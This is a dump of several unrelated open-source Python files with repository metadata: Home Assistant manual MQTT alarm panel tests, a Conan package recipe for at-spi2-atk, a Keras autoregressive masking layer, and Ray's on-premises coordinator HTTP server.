await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 10,
"pending_time": 0,
"armed_away": {"delay_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_pending_and_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 1,
"pending_time": 0,
"triggered": {"pending_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_pending_and_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 10,
"pending_time": 0,
"armed_away": {"delay_time": 1},
"triggered": {"pending_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_specific_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test arm home method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 10,
"triggered": {"pending_time": 2},
"trigger_time": 3,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_no_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"delay_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE, entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
async def test_arm_away_after_disabled_disarmed(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test pending state with and without zero trigger time."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 0,
"delay_time": 1,
"armed_away": {"pending_time": 1},
"disarmed": {"trigger_time": 0},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_DISARMED
assert state.attributes["post_pending_state"] == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_DISARMED
assert state.attributes["post_pending_state"] == STATE_ALARM_ARMED_AWAY
future = dt_util.utcnow() + timedelta(seconds=1)
with freeze_time(future):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_ARMED_AWAY
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with freeze_time(future):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_disarm_with_template_code(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Attempt to disarm with a valid or invalid template-based code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code_template": '{{ "" if from_state == "disarmed" else "abc" }}',
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_home(hass, "def")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_HOME
with pytest.raises(HomeAssistantError, match=r"Invalid alarm code provided$"):
await common.async_alarm_disarm(hass, "def")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_HOME
await common.async_alarm_disarm(hass, "abc")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_DISARMED
@pytest.mark.parametrize(
("config", "expected_state"),
[
("payload_arm_away", STATE_ALARM_ARMED_AWAY),
("payload_arm_custom_bypass", STATE_ALARM_ARMED_CUSTOM_BYPASS),
("payload_arm_home", STATE_ALARM_ARMED_HOME),
("payload_arm_night", STATE_ALARM_ARMED_NIGHT),
("payload_arm_vacation", STATE_ALARM_ARMED_VACATION),
],
)
async def test_arm_via_command_topic(
hass: HomeAssistant,
config,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arming via command topic."""
command = config[8:].upper()
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
config: command,
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
# Fire the arm command via MQTT; ensure state changes to arming
async_fire_mqtt_message(hass, "alarm/command", command)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == expected_state
async def test_disarm_pending_via_command_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming pending alarm via command topic."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
"payload_disarm": "DISARM",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
# Now that we're pending, receive a command to disarm
async_fire_mqtt_message(hass, "alarm/command", "DISARM")
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_state_changes_are_published_to_mqtt(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test publishing of MQTT messages when state changes."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"trigger_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
}
},
)
await hass.async_block_till_done()
# Component should send disarmed alarm state on startup
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_DISARMED, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in home mode
await common.async_alarm_arm_home(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_HOME, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in away mode
await common.async_alarm_arm_away(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_AWAY, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in night mode
await common.async_alarm_arm_night(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_NIGHT, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Disarm
await common.async_alarm_disarm(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_DISARMED, 0, True
)
async def test_no_mqtt(hass: HomeAssistant, caplog: pytest.LogCaptureFixture) -> None:
"""Test publishing of MQTT messages when state changes."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"state_topic": "alarm/state",
"command_topic": "alarm/command",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id) is None
assert "MQTT integration is not available" in caplog.text
|
0ad89341c86dd734f2743db405d23ce2a7a509d3
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/at-spi2-atk/all/conanfile.py
|
e8f187953a737e56e8be043b399e228a3a5d99b5
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,080
|
py
|
conanfile.py
|
from conan import ConanFile
from conan.errors import ConanInvalidConfiguration
from conan.tools.files import get, rmdir
from conans import Meson
import os
required_conan_version = ">=1.33.0"
class AtSPI2AtkConan(ConanFile):
name = "at-spi2-atk"
description = "library that bridges ATK to At-Spi2 D-Bus service."
topics = ("conan", "atk", "accessibility")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://gitlab.gnome.org/GNOME/at-spi2-atk"
license = "LGPL-2.1-or-later"
generators = "pkg_config"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
}
deprecated = "at-spi2-core"
_meson = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def validate(self):
if self.settings.os not in ("Linux", "FreeBSD"):
raise ConanInvalidConfiguration("at-spi2-atk is only supported on Linux and FreeBSD")
if self.options.shared and (not self.options["glib"].shared
or not self.options["at-spi2-core"].shared
or not self.options["atk"].shared):
raise ConanInvalidConfiguration(
"Linking a shared library against static glib can cause unexpected behaviour."
)
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def build_requirements(self):
self.build_requires("meson/1.1.1")
self.build_requires('pkgconf/1.9.3')
def requirements(self):
self.requires("at-spi2-core/2.44.1")
self.requires("atk/2.38.0")
self.requires("glib/2.76.3")
self.requires("libxml2/2.11.4")
def source(self):
get(self, **self.conan_data["sources"][self.version],
strip_root=True, destination=self._source_subfolder)
def _configure_meson(self):
if self._meson:
return self._meson
self._meson = Meson(self)
args=[]
args.append('--wrap-mode=nofallback')
self._meson.configure(build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths='.', args=args)
return self._meson
def build(self):
meson = self._configure_meson()
meson.build()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
meson = self._configure_meson()
meson.install()
rmdir(self, os.path.join(self.package_folder, 'lib', 'pkgconfig'))
def package_info(self):
self.cpp_info.libs = ['atk-bridge-2.0']
self.cpp_info.includedirs = [os.path.join('include', 'at-spi2-atk', '2.0')]
self.cpp_info.names['pkg_config'] = 'atk-bridge-2.0'
|
2ddc38540c9a237e3465e63db522bd333cba03be
|
a66149460eda1d5343ee8e94401d91f3f2270015
|
/notebooks/vae-inverse_autoregressive_flows/made.py
|
09faed76fb050911bf6ffc2779ada5e654de8b13
|
[
"MIT"
] |
permissive
|
bjlkeng/sandbox
|
59ae04a984f9a6a01caac78141250c9388e40574
|
3dac79472df6e895d6eb57f4fdbdaf2032ec0cf6
|
refs/heads/master
| 2023-09-01T03:06:34.845840
| 2023-08-18T01:11:43
| 2023-08-18T01:11:43
| 89,071,009
| 190
| 83
|
MIT
| 2023-08-18T01:13:22
| 2017-04-22T13:17:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 8,748
|
py
|
made.py
|
from random import randint
import numpy as np
from keras import backend as K
from keras.engine import Layer
from keras.layers import initializers
from keras.layers import activations
from keras.layers import regularizers
from keras.layers import constraints
class MaskingDense(Layer):
""" Just copied code from keras Dense layer and added masking and a few other tricks:
- Direct auto-regressive connections to output
- Allows a second (non-autoregressive) input that is fully connected to the first hidden layer
- Either 1 output or 2 outputs (concatenated) that are separately
auto-regressive with respect to the input
"""
def __init__(self, units, out_units,
hidden_layers=1,
dropout_rate=0.0,
random_input_order=False,
activation='elu',
out_activation='sigmoid',
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
out_kernel_initializer='glorot_uniform',
out_bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(MaskingDense, self).__init__(**kwargs)
self.input_sel = None
self.random_input_order = random_input_order
self.rate = min(1., max(0., dropout_rate))
self.kernel_sels = []
self.units = units
self.out_units = out_units
self.hidden_layers = hidden_layers
self.activation = activations.get(activation)
self.out_activation = activations.get(out_activation)
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.out_kernel_initializer = initializers.get(out_kernel_initializer)
self.out_bias_initializer = initializers.get(out_bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
def dropout_wrapper(self, inputs, training):
if 0. < self.rate < 1.:
def dropped_inputs():
return K.dropout(inputs, self.rate, noise_shape=None, seed=None)
return K.in_train_phase(dropped_inputs, inputs,
training=training)
return inputs
def build_layer_weights(self, input_dim, units, use_bias=True, is_output=False):
kernel_initializer = (self.kernel_initializer if not is_output
else self.out_kernel_initializer)
bias_initializer = (self.bias_initializer if not is_output
else self.out_bias_initializer)
kernel = self.add_weight(shape=(input_dim, units),
initializer=kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
if use_bias:
bias = self.add_weight(shape=(units,),
initializer=bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
bias = None
return kernel, bias
def build_mask(self, shape, prev_sel, is_output):
if is_output:
if shape[-1] == len(self.input_sel):
input_sel = self.input_sel
else:
input_sel = self.input_sel * 2
else:
# Disallow D-1 because it would violate auto-regressive property
# Disallow unconnected units by sampling min from previous layer
input_sel = [randint(np.min(prev_sel), shape[-1] - 2) for i in range(shape[-1])]
def vals():
in_len = len(self.input_sel)
for x in range(shape[-2]):
for y in range(shape[-1]):
if is_output:
yield 1 if prev_sel[x] < input_sel[y % in_len] else 0
else:
yield 1 if prev_sel[x] <= input_sel[y] else 0
return K.constant(list(vals()), dtype='float32', shape=shape), input_sel
def build(self, input_shape):
if isinstance(input_shape, list):
if len(input_shape) != 2:
raise ValueError('A list input is only supported for exactly two inputs')
input_shape, other_input_shape = input_shape
# Build weights for other (non-autoregressive) vector
other_shape = (other_input_shape[-1], self.units)
self.other_kernel, self.other_bias = self.build_layer_weights(*other_shape)
assert len(input_shape) >= 2
assert self.out_units == input_shape[-1] or self.out_units == 2 * input_shape[-1]
self.kernels, self.biases = [], []
self.kernel_masks, self.kernel_sels = [], []
shape = (input_shape[-1], self.units)
self.input_sel = np.arange(input_shape[-1])
if self.random_input_order:
np.random.shuffle(self.input_sel)
prev_sel = self.input_sel
for x in range(self.hidden_layers):
# Hidden layer
kernel, bias = self.build_layer_weights(*shape)
self.kernels.append(kernel)
self.biases.append(bias)
# Hidden layer mask
kernel_mask, kernel_sel = self.build_mask(shape, prev_sel, is_output=False)
self.kernel_masks.append(kernel_mask)
self.kernel_sels.append(kernel_sel)
prev_sel = kernel_sel
shape = (self.units, self.units)
# Direct connection between input/output
if self.hidden_layers > 0:
direct_shape = (input_shape[-1], self.out_units)
self.direct_kernel, _ = self.build_layer_weights(*direct_shape, use_bias=False,
is_output=True)
self.direct_kernel_mask, self.direct_sel = self.build_mask(direct_shape, self.input_sel,
is_output=True)
# Output layer
out_shape = (self.units, self.out_units)
self.out_kernel, self.out_bias = self.build_layer_weights(*out_shape, is_output=True)
self.out_kernel_mask, self.out_sel = self.build_mask(out_shape, prev_sel, is_output=True)
self.built = True
def call(self, inputs, training=None):
other_input = None
if isinstance(inputs, list):
assert len(inputs) == 2
assert self.hidden_layers > 0, "other input not supported if no hidden layers"
assert hasattr(self, 'other_kernel')
inputs, other_input = inputs
output = inputs
if other_input is not None:
other = K.dot(other_input, self.other_kernel)
other = K.bias_add(other, self.other_bias)
other = self.activation(other)
# Hidden layer + mask
for i in range(self.hidden_layers):
weight = self.kernels[i] * self.kernel_masks[i]
output = K.dot(output, weight)
# "other" input
if i == 0 and other_input is not None:
output = output + other
output = K.bias_add(output, self.biases[i])
output = self.activation(output)
output = self.dropout_wrapper(output, training)
# out_act(bias + (V dot M_v)h(x) + (A dot M_a)x + (other dot M_other)other)
output = K.dot(output, self.out_kernel * self.out_kernel_mask)
# Direct connection
if self.hidden_layers > 0:
direct = K.dot(inputs, self.direct_kernel * self.direct_kernel_mask)
output = output + direct
output = K.bias_add(output, self.out_bias)
output = self.out_activation(output)
output = self.dropout_wrapper(output, training)
return output
def compute_output_shape(self, input_shape):
if isinstance(input_shape, list):
input_shape = input_shape[0]
return (input_shape[0], self.out_units)
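# A minimal usage sketch (the sizes and hyper-parameters below are illustrative
# assumptions, not taken from the accompanying notebook). The only hard
# constraint, asserted in build(), is out_units == D or out_units == 2 * D for
# a D-dimensional auto-regressive input; the optional second input provides
# fully connected (non-autoregressive) conditioning.
if __name__ == '__main__':
    from keras.layers import Input
    from keras.models import Model

    D = 8
    x = Input(shape=(D,))   # auto-regressive input
    h = Input(shape=(4,))   # optional conditioning input
    made = MaskingDense(units=32, out_units=2 * D, hidden_layers=2)
    out = made([x, h])      # or made(x) to omit the conditioning input

    model = Model(inputs=[x, h], outputs=out)
    model.compile(optimizer='adam', loss='binary_crossentropy')
    print(model.output_shape)  # (None, 16)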
|
968595def93c6bd3bf3693f66e0509925a4381e2
|
0760fb4901a75766921a205b55686d6d6f049b30
|
/python/ray/autoscaler/local/coordinator_server.py
|
75c85b3966e54ea63980ea87a266cbd1e3d6fbb9
|
[
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ray-project/ray
|
a4bb6940b08b59a61ef0b8e755a52d8563a2f867
|
edba68c3e7cf255d1d6479329f305adb7fa4c3ed
|
refs/heads/master
| 2023-08-31T03:36:48.164405
| 2023-08-31T03:20:38
| 2023-08-31T03:20:38
| 71,932,349
| 29,482
| 5,669
|
Apache-2.0
| 2023-09-14T21:48:14
| 2016-10-25T19:38:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,223
|
py
|
coordinator_server.py
|
"""Web server that runs on local/private clusters to coordinate and manage
different clusters for multiple users. It receives node provider function calls
through HTTP requests from remote CoordinatorSenderNodeProvider and runs them
locally in LocalNodeProvider. To start the webserver the user runs:
`python coordinator_server.py --ips <comma separated ips> --port <PORT>`."""
import argparse
import json
import logging
import socket
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from ray.autoscaler._private.local.node_provider import LocalNodeProvider
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def runner_handler(node_provider):
class Handler(SimpleHTTPRequestHandler):
"""A custom handler for OnPremCoordinatorServer.
Handles all requests and responses coming into and from the
remote CoordinatorSenderNodeProvider.
"""
def _do_header(self, response_code=200, headers=None):
"""Sends the header portion of the HTTP response.
Args:
response_code: Standard HTTP response code
headers (list[tuples]): Standard HTTP response headers
"""
if headers is None:
headers = [("Content-type", "application/json")]
self.send_response(response_code)
for key, value in headers:
self.send_header(key, value)
self.end_headers()
def do_HEAD(self):
"""HTTP HEAD handler method."""
self._do_header()
def do_GET(self):
"""Processes requests from remote CoordinatorSenderNodeProvider."""
if self.headers["content-length"]:
raw_data = (
self.rfile.read(int(self.headers["content-length"]))
).decode("utf-8")
logger.info(
"OnPremCoordinatorServer received request: " + str(raw_data)
)
request = json.loads(raw_data)
response = getattr(node_provider, request["type"])(*request["args"])
logger.info(
"OnPremCoordinatorServer response content: " + str(raw_data)
)
response_code = 200
message = json.dumps(response)
self._do_header(response_code=response_code)
self.wfile.write(message.encode())
return Handler
class OnPremCoordinatorServer(threading.Thread):
"""Initializes HTTPServer and serves CoordinatorSenderNodeProvider forever.
It handles requests from the remote CoordinatorSenderNodeProvider. The
requests are forwarded to LocalNodeProvider function calls.
"""
def __init__(self, list_of_node_ips, host, port):
"""Initialize HTTPServer and serve forever by invoking self.run()."""
logger.info(
"Running on prem coordinator server on address " + host + ":" + str(port)
)
threading.Thread.__init__(self)
self._port = port
self._list_of_node_ips = list_of_node_ips
address = (host, self._port)
config = {"list_of_node_ips": list_of_node_ips}
self._server = HTTPServer(
address,
runner_handler(LocalNodeProvider(config, cluster_name=None)),
)
self.start()
def run(self):
self._server.serve_forever()
def shutdown(self):
"""Shutdown the underlying server."""
self._server.shutdown()
self._server.server_close()
def main():
parser = argparse.ArgumentParser(
description="Please provide a list of node ips and port."
)
parser.add_argument(
"--ips", required=True, help="Comma separated list of node ips."
)
parser.add_argument(
"--port",
type=int,
required=True,
help="The port on which the coordinator listens.",
)
args = parser.parse_args()
list_of_node_ips = args.ips.split(",")
OnPremCoordinatorServer(
list_of_node_ips=list_of_node_ips,
host=socket.gethostbyname(socket.gethostname()),
port=args.port,
)
if __name__ == "__main__":
main()
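# --- Editor's sketch: how a client talks to this server -----------------------
# The handler above expects a JSON body of the form {"type": <NodeProvider
# method name>, "args": [...]} and replies with the JSON-encoded return value.
# The helper below is illustrative only (the method name, host and port are
# assumptions); the real client is CoordinatorSenderNodeProvider.
def _example_request(host="127.0.0.1", port=1234):
    import urllib.request
    payload = json.dumps({"type": "non_terminated_nodes", "args": [{}]}).encode()
    req = urllib.request.Request(
        "http://{}:{}".format(host, port),
        data=payload,
        headers={"Content-type": "application/json"},
        method="GET",  # the server dispatches requests from do_GET
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read().decode())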
|
6683cc7b4c377515291f3efa98cd247f10940bfc
|
5dc35a39169d191166c44b7ac45389a14e5b0857
|
/twiml/voice/conference/conference-6/conference-6.8.x.py
|
9c8e558138288bc0cb3a09073c402295049e04f1
|
[
"MIT"
] |
permissive
|
TwilioDevEd/api-snippets
|
035b7ceaf9c03c932010919ee1747bf895d4591e
|
ca6160d8e626bdf137f783324807285bb01d006f
|
refs/heads/master
| 2023-08-17T19:20:35.751733
| 2023-08-04T18:47:58
| 2023-08-04T18:47:58
| 49,965,712
| 267
| 551
|
MIT
| 2023-09-11T14:04:34
| 2016-01-19T16:21:44
|
Java
|
UTF-8
|
Python
| false
| false
| 326
|
py
|
conference-6.8.x.py
|
